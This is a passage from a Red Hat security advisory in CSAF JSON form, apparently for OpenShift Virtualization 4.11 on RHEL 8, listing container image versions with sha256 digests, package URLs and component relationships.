"pkg:oci/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator\u0026tag=v4.11.0-24" } } }, { "category": "product_version", "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "product": { "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "product_id": "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "product_identification_helper": { "purl": "pkg:oci/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator\u0026tag=v4.11.0-96" } } }, { "category": "product_version", "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "product": { "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "product_id": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "product_identification_helper": { "purl": "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8\u0026tag=v4.11.0-96" } } }, { "category": "product_version", "name": "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "product": { "name": "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "product_id": "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "product_identification_helper": { "purl": "pkg:oci/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubemacpool\u0026tag=v4.11.0-26" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "product": { "name": "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "product_id": "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-console-plugin\u0026tag=v4.11.0-83" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "product": { "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "product_id": "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator\u0026tag=v4.11.0-54" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm\u0026tag=v4.11.0-7" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-copy-template\u0026tag=v4.11.0-7" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-datavolume\u0026tag=v4.11.0-7" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template\u0026tag=v4.11.0-7" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize\u0026tag=v4.11.0-7" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep\u0026tag=v4.11.0-7" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template\u0026tag=v4.11.0-7" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-operator\u0026tag=v4.11.0-29" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "product": { "name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "product_id": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status\u0026tag=v4.11.0-7" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "product": { "name": "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "product_id": "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator\u0026tag=v4.11.0-17" } } }, { "category": "product_version", "name": "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "product": { "name": "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "product_id": "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "product_identification_helper": { "purl": "pkg:oci/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools\u0026tag=v4.11.0-106" } } }, { "category": "product_version", "name": "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "product": { "name": "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "product_id": "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "product_identification_helper": { "purl": "pkg:oci/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker\u0026tag=v4.11.0-26" } } }, { "category": "product_version", "name": "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "product": { "name": "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "product_id": "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "product_identification_helper": { "purl": "pkg:oci/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin\u0026tag=v4.11.0-26" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "product": { "name": "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "product_id": "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-api\u0026tag=v4.11.0-106" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "product": { "name": "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "product_id": "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server\u0026tag=v4.11.0-106" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "product": { "name": "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "product_id": "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver\u0026tag=v4.11.0-59" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "product": { "name": "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "product_id": "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner\u0026tag=v4.11.0-59" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "product": { "name": "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "product_id": "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller\u0026tag=v4.11.0-59" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "product": { "name": "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "product_id": "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer\u0026tag=v4.11.0-59" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "product": { "name": "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "product_id": "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator\u0026tag=v4.11.0-59" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "product": { "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "product_id": "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy\u0026tag=v4.11.0-59" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "product": { "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "product_id": "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver\u0026tag=v4.11.0-59" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "product": { "name": "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "product_id": "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-controller\u0026tag=v4.11.0-106" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "product": { "name": "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "product_id": "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-handler\u0026tag=v4.11.0-106" } } }, { "category": "product_version", "name": "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "product": { "name": "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "product_id": "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "product_identification_helper": { "purl": "pkg:oci/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virtio-win\u0026tag=v4.11.0-16" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "product": { "name": "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "product_id": "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-launcher\u0026tag=v4.11.0-106" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "product": { "name": "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "product_id": "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-operator\u0026tag=v4.11.0-106" } } }, { "category": "product_version", "name": "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", "product": { "name": "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", "product_id": "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", "product_identification_helper": { "purl": "pkg:oci/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-network-latency-checkup\u0026tag=v4.11.0-67" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64" }, "product_reference": "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64" }, "product_reference": "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64" }, "product_reference": "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64" }, "product_reference": "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64" }, "product_reference": "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "relates_to_product_reference": "8Base-CNV-4.11" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64 as a component of CNV 4.11 for RHEL 8", "product_id": "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64" }, "product_reference": "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "relates_to_product_reference": 